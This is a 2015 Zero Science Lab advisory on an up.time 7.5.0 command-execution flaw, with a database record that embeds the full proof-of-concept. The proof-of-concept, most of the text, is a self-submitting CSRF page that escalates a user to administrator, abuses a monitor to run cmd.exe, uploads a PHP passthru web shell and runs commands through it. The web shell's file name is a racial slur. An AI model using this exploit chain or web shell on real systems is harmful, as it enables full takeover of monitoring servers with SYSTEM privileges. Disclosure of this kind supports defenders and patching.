Description
Title: up.time 7.5.0 Upload And Execute File Exploit
Advisory ID: [ZSL-2015-5254](<ZSL-2015-5254.php>)
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 19.08.2015
##### Summary
The next-generation of IT monitoring software.
##### Description
up.time suffers from arbitrary command execution. Attackers can exploit this issue using the monitor service feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF, Privilege Escalation, Arbitrary text file creation and renaming that file to php for example in arbitrary location and executing system commands with SYSTEM privileges.
##### Vendor
Idera Inc. - <http://www.uptimesoftware.com>
##### Affected Version
7.5.0 (build 16) and 7.4.0 (build 13)
##### Tested On
Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
##### Vendor Status
[29.07.2015] Vulnerability discovered.
[06.08.2015] Vendor contacted.
[18.08.2015] No response from the vendor.
[19.08.2015] Public security advisory released.
##### PoC
[uptime_cmd.txt](<../../codes/uptime_cmd.txt>)
##### Credits
Vulnerability discovered by Ewerson Guimaraes - <[crash@dclabs.com.br](<mailto:crash@dclabs.com.br>)>
##### References
[1] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php>
[2] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php>
[3] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php>
[4] <http://cxsecurity.com/issue/WLB-2015080117>
[5] <https://www.exploit-db.com/exploits/37888/>
[6] <https://packetstormsecurity.com/files/133255>
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/105873>
[8] <https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/uptime_file_upload_2.rb>
[9] <https://cxsecurity.com/issue/WLB-2015110103>
[10] <https://cxsecurity.com/issue/WLB-2015110102>
[11] <https://packetstormsecurity.com/files/134333>
[12] <https://community.rapid7.com/community/metasploit/blog/2015/11/20/weekly-metasploit-wrapup>
[13] <http://www.rapid7.com/db/modules/exploit/multi/http/uptime_file_upload_2>
##### Changelog
[19.08.2015] - Initial release
[13.09.2015] - Added reference [4], [5], [6] and [7]
[14.11.2015] - Added reference [8], [9] and [10]
[15.11.2015] - Added reference [11]
[23.11.2015] - Added reference [12] and [13]
##### Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)
{"id": "ZSL-2015-5254", "vendorId": null, "type": "zeroscience", "bulletinFamily": "exploit", "title": "up.time 7.5.0 Upload And Execute File Exploit", "description": "Title: up.time 7.5.0 Upload And Execute File Exploit \nAdvisory ID: [ZSL-2015-5254](<ZSL-2015-5254.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (4/5) \nRelease Date: 19.08.2015 \n\n\n##### Summary\n\nThe next-generation of IT monitoring software. \n\n##### Description\n\nup.time suffers from arbitrary command execution. Attackers can exploit this issue using the monitor service feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF, Privilege Escalation, Arbitrary text file creation and renaming that file to php for example in arbitrary location and executing system commands with SYSTEM privileges. \n\n##### Vendor\n\nIdera Inc. - <http://www.uptimesoftware.com>\n\n##### Affected Version\n\n7.5.0 (build 16) and 7.4.0 (build 13) \n\n##### Tested On\n\nJetty, PHP/5.4.34, MySQL \nApache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34 \n\n##### Vendor Status\n\n[29.07.2015] Vulnerability discovered. \n[06.08.2015] Vendor contacted. \n[18.08.2015] No response from the vendor. \n[19.08.2015] Public security advisory released. \n\n##### PoC\n\n[uptime_cmd.txt](<../../codes/uptime_cmd.txt>)\n\n##### Credits\n\nVulnerability discovered by Ewerson Guimaraes - <[crash@dclabs.com.br](<mailto:crash@dclabs.com.br>)>\n\n##### References\n\n[1] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php> \n[2] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php> \n[3] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php> \n[4] <http://cxsecurity.com/issue/WLB-2015080117> \n[5] <https://www.exploit-db.com/exploits/37888/> \n[6] <https://packetstormsecurity.com/files/133255> \n[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/105873> \n[8] <https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/uptime_file_upload_2.rb> \n[9] <https://cxsecurity.com/issue/WLB-2015110103> \n[10] <https://cxsecurity.com/issue/WLB-2015110102> \n[11] <https://packetstormsecurity.com/files/134333> \n[12] <https://community.rapid7.com/community/metasploit/blog/2015/11/20/weekly-metasploit-wrapup> \n[13] <http://www.rapid7.com/db/modules/exploit/multi/http/uptime_file_upload_2>\n\n##### Changelog\n\n[19.08.2015] - Initial release \n[13.09.2015] - Added reference [4], [5], [6] and [7] \n[14.11.2015] - Added reference [8], [9] and [10] \n[15.11.2015] - Added reference [11] \n[23.11.2015] - Added reference [12] and [13] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "published": "2015-08-19T00:00:00", "modified": "2015-08-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php", "reporter": "Ewerson Guimaraes", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-15T06:44:59", "viewCount": 5, "enchantments": {"dependencies": {"references": []}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2017-662.NASL", "SUSE_SU-2017-1445-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:3B05FD25F1EFE431C23369F5790520EB"]}, {"type": "zeroscience", "idList": ["ZSL-2015-5251", "ZSL-2015-5252", "ZSL-2015-5253"]}]}, "exploitation": null, "vulnersScore": 5.9}, "sourceHref": "http://zeroscience.mk/codes/uptime_cmd.txt", "sourceData": "<html><body><p>\ufeff\r\nup.time 7.5.0 Upload And Execute File Exploit\r\n\r\n\r\nVendor: Idera Inc.\r\nProduct web page: http://www.uptimesoftware.com\r\nAffected version: 7.5.0 (build 16) and 7.4.0 (build 13)\r\n\r\nSummary: The next-generation of IT monitoring software.\r\n\r\nDesc: up.time suffers from arbitrary command execution.\r\nAttackers can exploit this issue using the monitor service\r\nfeature and adding a command with respected arguments to given\r\nbinary for execution. In combination with the CSRF, Privilege\r\nEscalation, Arbitrary text file creation and renaming that\r\nfile to php for example in arbitrary location and executing\r\nsystem commands with SYSTEM privileges.\r\n\r\nTested on: Jetty, PHP/5.4.34, MySQL\r\n Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34\r\n\r\n\r\nVulnerability discovered by Ewerson 'Crash' Guimaraes\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5254\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php\r\n\r\n\r\n29.07.2015\r\n\r\n--\r\n\r\n\r\n\r\n </p>\n<title>Uptime Exploit</title>\n<!-- Login -->\n<form action=\"http://127.0.0.1:9999/index.php\" method=\"POST\" name=\"login\" target=\"frame0\">\n<input name=\"username\" type=\"hidden\" value=\"sample\"/>\n<input name=\"password\" type=\"hidden\" value=\"123456\"/>\n</form>\n<!-- Escalate privileges -->\n<form action=\"http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2\" method=\"POST\" name=\"privadm\" target=\"frame1\">\n<input name=\"operation\" type=\"hidden\" value=\"submit\"/>\n<input name=\"disableEditOfUsernameRoleGroup\" type=\"hidden\" value=\"false\"/>\n<input name=\"username\" type=\"hidden\" value=\"sample\"/>\n<input name=\"password\" type=\"hidden\" value=\"123456\"/>\n<input name=\"passwordConfirm\" type=\"hidden\" value=\"123456\"/>\n<input name=\"firstname\" type=\"hidden\" value=\"Sample\"/>\n<input name=\"lastname\" type=\"hidden\" value=\"User\"/>\n<input name=\"location\" type=\"hidden\" value=\"\"/>\n<input name=\"emailaddress\" type=\"hidden\" value=\"\"/>\n<input name=\"emailtimeperiodid\" type=\"hidden\" value=\"1\"/>\n<input name=\"phonenumber\" type=\"hidden\" value=\"\"/>\n<input name=\"phonenumbertimeperiodid\" type=\"hidden\" value=\"1\"/>\n<input name=\"windowshost\" type=\"hidden\" value=\"\"/>\n<input name=\"windowsworkgroup\" type=\"hidden\" value=\"\"/>\n<input name=\"windowspopuptimeperiodid\" type=\"hidden\" value=\"1\"/>\n<input name=\"landingpage\" type=\"hidden\" value=\"MyPortal\"/>\n<input name=\"isonvacation\" type=\"hidden\" value=\"0\"/>\n<input name=\"receivealerts\" type=\"hidden\" value=\"0\"/>\n<input name=\"activexgraphs\" type=\"hidden\" value=\"0\"/>\n<input name=\"newuser\" type=\"hidden\" value=\"on\"/>\n<input name=\"newuser\" type=\"hidden\" value=\"1\"/>\n<input name=\"userroleid\" type=\"hidden\" value=\"1\"/>\n<input name=\"usergroupid[]\" type=\"hidden\" value=\"1\"/>\n</form>\n<!-- Log-off to refresh permission -->\n<form action=\"http://127.0.0.1:9999/main.php\" method=\"POST\" name=\"logoff\" target=\"frame2\">\n<input name=\"logout\" type=\"hidden\" value=\"1\"/>\n</form>\n<!-- Login with escalated user -->\n<form action=\"http://127.0.0.1:9999/index.php?loggedout\" method=\"POST\" name=\"login2\" target=\"frame3\">\n<input name=\"username\" type=\"hidden\" value=\"sample\"/>\n<input name=\"password\" type=\"hidden\" value=\"123456\"/>\n</form>\n<!-- Creating Monitor to rename php shell -->\n<form action=\"http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add\" method=\"POST\" name=\"createmonitor\" target=\"frame4\">\n<input name=\"initialERDCId\" type=\"hidden\" value=\"20\"/>\n<input name=\"target\" type=\"hidden\" value=\"1\"/>\n<input name=\"targetType\" type=\"hidden\" value=\"systemList\"/>\n<input name=\"systemList\" type=\"hidden\" value=\"1\"/>\n<input name=\"serviceGroupList\" type=\"hidden\" value=\"-10\"/>\n<input name=\"initialMode\" type=\"hidden\" value=\"standard\"/>\n<input name=\"erdcName\" type=\"hidden\" value=\"Exploit\"/>\n<input name=\"erdcInitialName\" type=\"hidden\" value=\"\"/>\n<input name=\"erdcDescription\" type=\"hidden\" value=\"Exploit\"/>\n<input name=\"hostButton\" type=\"hidden\" value=\"system\"/>\n<input name=\"erdc_id\" type=\"hidden\" value=\"20\"/>\n<input name=\"forceReload\" type=\"hidden\" value=\"0\"/>\n<input name=\"operation\" type=\"hidden\" value=\"standard\"/>\n<input name=\"erdc_instance_id\" type=\"hidden\" value=\"\"/>\n<input name=\"label_[184]\" type=\"hidden\" value=\"Script Name\"/>\n<input name=\"value_[184]\" type=\"hidden\" value=\"c:\\windows\\system32\\cmd.exe\"/>\n<input name=\"id_[184]\" type=\"hidden\" value=\"process\"/>\n<input name=\"name_[process]\" type=\"hidden\" value=\"184\"/>\n<input name=\"units_[184]\" type=\"hidden\" value=\"\"/>\n<input name=\"guiBasic_[184]\" type=\"hidden\" value=\"1\"/>\n<input name=\"inputType_[184]\" type=\"hidden\" value=\"GUIString\"/>\n<input name=\"screenOrder_[184]\" type=\"hidden\" value=\"1\"/>\n<input name=\"parmType_[184]\" type=\"hidden\" value=\"1\"/>\n<input name=\"label_[185]\" type=\"hidden\" value=\"Arguments\"/>\n<input name=\"value_[185]\" type=\"hidden\" value=' /C ren \"C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\nigga.txt\" \"nigga.php\" '/>\n<input name=\"id_[185]\" type=\"hidden\" value=\"args\"/>\n<input name=\"name_[args]\" type=\"hidden\" value=\"185\"/>\n<input name=\"units_[185]\" type=\"hidden\" value=\"\"/>\n<input name=\"guiBasic_[185]\" type=\"hidden\" value=\"1\"/>\n<input name=\"inputType_[185]\" type=\"hidden\" value=\"GUIString\"/>\n<input name=\"screenOrder_[185]\" type=\"hidden\" value=\"2\"/>\n<input name=\"parmType_[185]\" type=\"hidden\" value=\"1\"/>\n<input name=\"label_[187]\" type=\"hidden\" value=\"Output\"/>\n<input name=\"can_retain_[187]\" type=\"hidden\" value=\"false\"/>\n<input name=\"comparisonWarn_[187]\" type=\"hidden\" value=\"-1\"/>\n<input name=\"comparison_[187]\" type=\"hidden\" value=\"-1\"/>\n<input name=\"id_[187]\" type=\"hidden\" value=\"value_critical_output\"/>\n<input name=\"name_[output]\" type=\"hidden\" value=\"187\"/>\n<input name=\"units_[187]\" type=\"hidden\" value=\"\"/>\n<input name=\"guiBasic_[187]\" type=\"hidden\" value=\"1\"/>\n<input name=\"inputType_[187]\" type=\"hidden\" value=\"GUIString\"/>\n<input name=\"screenOrder_[187]\" type=\"hidden\" value=\"4\"/>\n<input name=\"parmType_[187]\" type=\"hidden\" value=\"2\"/>\n<input name=\"label_[189]\" type=\"hidden\" value=\"Response time\"/>\n<input name=\"can_retain_[189]\" type=\"hidden\" value=\"false\"/>\n<input name=\"comparisonWarn_[189]\" type=\"hidden\" value=\"-1\"/>\n<input name=\"comparison_[189]\" type=\"hidden\" value=\"-1\"/>\n<input name=\"id_[189]\" type=\"hidden\" value=\"value_critical_timer\"/>\n<input name=\"name_[timer]\" type=\"hidden\" value=\"189\"/>\n<input name=\"units_[189]\" type=\"hidden\" value=\"ms\"/>\n<input name=\"guiBasic_[189]\" type=\"hidden\" value=\"0\"/>\n<input name=\"inputType_[189]\" type=\"hidden\" value=\"GUIInteger\"/>\n<input name=\"screenOrder_[189]\" type=\"hidden\" value=\"6\"/>\n<input name=\"parmType_[189]\" type=\"hidden\" value=\"2\"/>\n<input name=\"timing_[erdc_instance_monitored]\" type=\"hidden\" value=\"1\"/>\n<input name=\"timing_[timeout]\" type=\"hidden\" value=\"60\"/>\n<input name=\"timing_[check_interval]\" type=\"hidden\" value=\"10\"/>\n<input name=\"timing_[recheck_interval]\" type=\"hidden\" value=\"1\"/>\n<input name=\"timing_[max_rechecks]\" type=\"hidden\" value=\"3\"/>\n<input name=\"alerting_[notification]\" type=\"hidden\" value=\"1\"/>\n<input name=\"alerting_[alert_interval]\" type=\"hidden\" value=\"120\"/>\n<input name=\"alerting_[alert_on_critical]\" type=\"hidden\" value=\"1\"/>\n<input name=\"alerting_[alert_on_warning]\" type=\"hidden\" value=\"1\"/>\n<input name=\"alerting_[alert_on_recovery]\" type=\"hidden\" value=\"1\"/>\n<input name=\"alerting_[alert_on_unknown]\" type=\"hidden\" value=\"1\"/>\n<input name=\"time_period_id\" type=\"hidden\" value=\"1\"/>\n<input name=\"pageFinish\" type=\"hidden\" value=\"Finish\"/>\n<input name=\"pageContinue\" type=\"hidden\" value=\"Continue...\"/>\n<input name=\"isWizard\" type=\"hidden\" value=\"1\"/>\n<input name=\"wizardPage\" type=\"hidden\" value=\"2\"/>\n<input name=\"wizardNumPages\" type=\"hidden\" value=\"2\"/>\n<input name=\"wizardTask\" type=\"hidden\" value=\"pageFinish\"/>\n<input name=\"visitedPage[1]\" type=\"hidden\" value=\"1\"/>\n<input name=\"visitedPage[2]\" type=\"hidden\" value=\"1\"/>\n</form>\n<!-- Uploading php shell txt format -->\n<form action=\"http://127.0.0.1:9999/wizards/post2file.php\" method=\"POST\" name=\"uploadshell\" target=\"frame5\">\n<input name=\"file_name\" type=\"hidden\" value=\"nigga.txt\"/>\n<input name=\"script\" type=\"hidden\" value=\"<? passthru($_GET['cmd']); ?>\"/>\n</form>\n<!-- Run command to rename php shell -->\n<form action=\"http://127.0.0.1:9999/main.php\" method=\"POST\" name=\"run\" target=\"frame6\">\n<input name=\"section\" type=\"hidden\" value=\"RunERDCInstance\"/>\n<input name=\"subsection\" type=\"hidden\" value=\"view\"/>\n<input name=\"id\" type=\"hidden\" value=\"65535\"/>\n<input name=\"name\" type=\"hidden\" value=\"Exploit\"/>\n</form>\n<!-- Executing basic command -->\n<form action=\"http://127.0.0.1:9999/wizards/nigga.php\" method=\"GET\" name=\"exploit\" target=\"frame7\">\n<input name=\"cmd\" type=\"hidden\" value=\"whoami\"/>\n</form>\n<iframe name=\"frame0\"></iframe>\n<iframe name=\"frame1\"></iframe>\n<iframe name=\"frame2\"></iframe>\n<iframe name=\"frame3\"></iframe>\n<iframe name=\"frame4\"></iframe>\n<iframe name=\"frame5\"></iframe>\n<iframe name=\"frame6\"></iframe>\n<iframe name=\"frame7\"></iframe>\n<script>\r\n function runme()\r\n {\r\n document.login.submit();\r\n document.getElementsByTagName(\"iframe\")[0].onload = function()\r\n//document.write(\"Login....\")\r\n {\r\ndocument.privadm.submit();\r\ndocument.getElementsByTagName(\"iframe\")[1].onload = function()\r\n//document.write(\"Mutating to admin uahsuasuas\");\r\n {\r\ndocument.logoff.submit();\r\ndocument.getElementsByTagName(\"iframe\")[2].onload = function()\r\n//document.write(\"Refreshing perms...\");\r\n {\r\ndocument.login2.submit();\r\ndocument.getElementsByTagName(\"iframe\")[3].onload = function()\r\n//document.write(\"Login again...Keep Calm....\");\r\n {\r\ndocument.createmonitor.submit();\r\ndocument.getElementsByTagName(\"iframe\")[4].onload = function()\r\n//document.write(\"Creating F*cking monitor\");\r\n {\r\ndocument.uploadshell.submit();\r\ndocument.getElementsByTagName(\"iframe\")[5].onload = function()\r\n//document.write(\"Uploading webshell. Muaaaaa! Muaaaaa!!\");\r\n {\r\ndocument.run.submit();\r\ndocument.getElementsByTagName(\"iframe\")[6].onload = function()\r\n//document.write(\"Trick to shell... come on....\");\r\n {\r\ndocument.exploit.submit();\r\ndocument.getElementsByTagName(\"iframe\")[7].onload = function()\r\nalert('Pwned!!!!!!!!!!!!!!!!!!!!!!')\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n</script>\n</body></html>", "impact": "System Access", "exploit_type": "Local/Remote", "_state": {"dependencies": 1647589307, "score": 0}}
{}